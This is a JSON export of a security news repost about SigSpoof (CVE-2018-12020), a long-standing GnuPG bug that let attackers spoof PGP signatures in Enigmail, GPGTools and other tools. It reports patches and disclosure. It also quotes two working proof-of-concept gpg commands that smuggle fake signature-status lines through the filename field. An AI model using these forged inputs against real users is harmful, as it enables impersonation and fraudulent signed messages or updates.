{"id":2951,"date":"2018-06-15T00:27:08","date_gmt":"2018-06-15T00:27:08","guid":{"rendered":"https:\/\/packetstormsecurity.com\/news\/view\/29049\/Decades-Old-PGP-Bug-Allowed-Hackers-To-Spoof-Just-About-Anyones-Signature.html"},"modified":"2018-06-15T00:27:08","modified_gmt":"2018-06-15T00:27:08","slug":"decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature","status":"publish","type":"post","link":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/","title":{"rendered":"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#8217;s Signature"},"content":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2018\/06\/not-signed-nor-encrypted-800x513.png\"\/><\/p>\n<aside id=\"social-left\"><a title=\"23 posters participating\" class=\"comment-count icon-comment-bubble-down\" href=\"https:\/\/arstechnica.com\/information-technology\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/?comments=1\"><span class=\"comment-count-before\">reader comments<\/span> <span class=\"comment-count-number\">28<\/span><\/a><\/p>\n<div class=\"share-links\"><span>Share this story<\/span> <\/div>\n<\/aside>\n<p>For their entire existence, some of the world&#8217;s most widely used email encryption tools have been vulnerable to hacks that allowed attackers to spoof the digital signature of just about any person with a public key, a researcher said Wednesday. GnuPG, Enigmail, GPGTools, and python-gnupg have all been updated to patch the critical vulnerability. Enigmail and the Simple Password Store have also received patches for two related spoofing bugs.<\/p>\n<p>Digital signatures are used to prove the source of an encrypted message, data backup, or software update. Typically, the source must use a private encryption key to cause an application to show that a message or file is signed. But a series of vulnerabilities dubbed SigSpoof makes it possible in certain cases for attackers to fake signatures with nothing more than someone\u2019s public key or key ID, both of which are often published online. The spoofed email shown at the top of this post can&#8217;t be detected as malicious without doing forensic analysis that&#8217;s beyond the ability of many users.<\/p>\n<h2>Backups and software updates affected, too<\/h2>\n<p>The flaw, indexed as CVE-2018-12020, means that decades&#8217; worth of email messages many people relied on for sensitive business or security matters may have in fact been spoofs. It also has the potential to affect uses that went well beyond encrypted email.<\/p>\n<p>&#8220;The vulnerability in GnuPG goes deep and has the potential to affect a large part of our core infrastructure,&#8221; Marcus Brinkmann, the software developer who discovered SigSpoof, wrote in an <a href=\"https:\/\/neopg.io\/blog\/gpg-signature-spoof\/#proof-of-concept-ii-signature-and-encryption-spoof-enigmail\">advisory published Wednesday<\/a>. &#8220;GnuPG is not only used for email security but also to secure backups, software updates in distributions, and source code in version control systems like Git.&#8221;<\/p>\n<p>CVE-2018-12020 affects vulnerable software only when it enables a setting called verbose, which is used to troubleshoot bugs or unexpected behavior. None of the vulnerable programs enables verbose by default, but a variety of highly recommended configurations available online\u2014including the <a href=\"https:\/\/github.com\/coruus\/cooperpair\/blob\/master\/saneprefs\/gpg.conf\">cooperpair safe defaults<\/a>, <a href=\"https:\/\/gist.github.com\/anonymous\/3d928a0bcbb3ed92c454\">Ultimate GPG settings<\/a>, and <a href=\"https:\/\/blog.bmarwell.de\/gnupg\/einstellungen-fur-gnupg\/\">Ben&#8217;s IT-Kommentare<\/a>\u2014turn it on. Once verbose is enabled, Brinkmann&#8217;s post includes three separate proof-of-concept spoofing attacks that work against the previously mentioned tools and possibly many others.<\/p>\n<p>The spoofing works by hiding metadata in an encrypted email or other message in a way that causes applications to treat it as if it were the result of a signature-verification operation. Applications such as Enigmail and GPGTools then cause email clients such as Thunderbird or Apple Mail to falsely show that an email was cryptographically signed by someone chosen by the attacker. All that&#8217;s required to spoof a signature is to have a public key or key ID.<\/p>\n<p>The attacks are relatively easy to carry out. The code for one of Brinkmann\u2019s PoC exploits that forges the digital signature of Enigmail developer Patrick Brunschwig is:<\/p>\n<pre>\n$ echo 'Please send me one of those expensive washing machines.' \\\n| gpg --armor -r VICTIM_KEYID --encrypt --set-filename \"`echo -ne \\''\\\n\\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig \\\n\\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\\\n\\n[GNUPG:] TRUST_FULLY 0 classic\\\n\\ngpg: '\\'`\" &gt; poc1.msg\n<\/pre>\n<p>A second exploit is:<\/p>\n<pre>\necho \"See you at the secret spot tomorrow 10am.\" | gpg --armor --store --compress-level 0 --set-filename \"`echo -ne \\''\\\n\\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig \\\n\\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\\\n\\n[GNUPG:] TRUST_FULLY\\\n\\n[GNUPG:] BEGIN_DECRYPTION\\\n\\n[GNUPG:] DECRYPTION_OKAY\\\n\\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\\\n\\ngpg: '\\'`\" &gt; poc2.msg\n<\/pre>\n<p>Brinkmann told Ars that the root cause of the bug goes back to GnuPG 0.2.2 from 1998, &#8220;although the impact would have been different then and changed over time as more apps use GPG.&#8221; He publicly disclosed the vulnerability only after developers of the tools known to be vulnerable were patched. The flaws are patched in <a href=\"https:\/\/lists.gnupg.org\/pipermail\/gnupg-announce\/2018q2\/000425.html\">GnuPG version 2.2.8<\/a>, <a href=\"https:\/\/sourceforge.net\/p\/enigmail\/forum\/announce\/thread\/b948279f\/\">Enigmail 2.0.7<\/a>, <a href=\"https:\/\/gpgtools.org\/\">GPGTools 2018.3,<\/a> and <a href=\"https:\/\/groups.google.com\/forum\/#!topic\/python-gnupg\/2yAlj_F2S1g\">python GnuPG 0.4.3<\/a>. People who want to know the status of other applications that use OpenPGP should check with the developers.<\/p>\n<aside class=\"pullbox sidebar story-sidebar right\">\n<\/aside>\n<p>Wednesday&#8217;s vulnerability disclosure comes a month after researchers revealed a different set of flaws that made it possible for attackers to <a href=\"https:\/\/arstechnica.com\/information-technology\/2018\/05\/decade-old-efail-attack-can-decrypt-previously-obtained-encrypted-e-mails\/\">decrypt previously obtained emails that were encrypted using PGP or S\/MIME<\/a>. Efail, as the bugs were dubbed, could be exploited in a variety of email programs, including Thunderbird, Apple Mail, and Outlook.<\/p>\n<p>Separately, Brinkmann reported two\u00a0SigSpoof-related vulnerabilities in Enigmail and the Simple Password Store that also made it possible to spoof digital signatures in some cases. <a href=\"https:\/\/neopg.io\/blog\/enigmail-signature-spoof\/\">CVE-2018-12019<\/a> affecting Enigmail can be triggered even when the verbose setting isn&#8217;t enabled. It, too, is patched in the just-released version 2.0.7. <a href=\"https:\/\/neopg.io\/blog\/pass-signature-spoof\/\">CVE-2018-12356<\/a>, meanwhile, let remote attackers spoof file signatures on configuration files and extensions scripts, potentially allowing the accessing of passwords or the execution of malicious code. The fix is <a href=\"https:\/\/lists.zx2c4.com\/pipermail\/password-store\/2018-June\/003309.html\">here<\/a>.<\/p>\n<p>READ MORE <a href=\"https:\/\/packetstormsecurity.com\/news\/view\/29049\/Decades-Old-PGP-Bug-Allowed-Hackers-To-Spoof-Just-About-Anyones-Signature.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":2952,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[60],"tags":[168],"class_list":["post-2951","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-packet-storm","tag-headlineflawcryptography"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v28.0 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#039;s Signature 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#039;s Signature 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2018-06-15T00:27:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png\" \/>\n\t<meta property=\"og:image:width\" content=\"800\" \/>\n\t<meta property=\"og:image:height\" content=\"513\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#8217;s Signature\",\"datePublished\":\"2018-06-15T00:27:08+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/\"},\"wordCount\":705,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png\",\"keywords\":[\"headline,flaw,cryptography\"],\"articleSection\":[\"Packet Storm\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/\",\"name\":\"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone's Signature 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png\",\"datePublished\":\"2018-06-15T00:27:08+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#primaryimage\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2018\\\/06\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png\",\"width\":800,\"height\":513},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"headline,flaw,cryptography\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/headlineflawcryptography\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#8217;s Signature\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone's Signature 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/","og_locale":"en_US","og_type":"article","og_title":"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone's Signature 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2018-06-15T00:27:08+00:00","og_image":[{"width":800,"height":513,"url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png","type":"image\/png"}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#8217;s Signature","datePublished":"2018-06-15T00:27:08+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/"},"wordCount":705,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png","keywords":["headline,flaw,cryptography"],"articleSection":["Packet Storm"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/","url":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/","name":"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone's Signature 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#primaryimage"},"thumbnailUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png","datePublished":"2018-06-15T00:27:08+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#primaryimage","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2018\/06\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature.png","width":800,"height":513},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/decades-old-pgp-bug-allowed-hackers-to-spoof-just-about-anyones-signature\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"headline,flaw,cryptography","item":"https:\/\/www.threatshub.org\/blog\/tag\/headlineflawcryptography\/"},{"@type":"ListItem","position":3,"name":"Decades-Old PGP Bug Allowed Hackers To Spoof Just About Anyone&#8217;s Signature"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH Author"}}]}},"_links":{"self":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/2951","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/comments?post=2951"}],"version-history":[{"count":0,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/posts\/2951\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media\/2952"}],"wp:attachment":[{"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/media?parent=2951"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/categories?post=2951"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.threatshub.org\/blog\/wp-json\/wp\/v2\/tags?post=2951"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}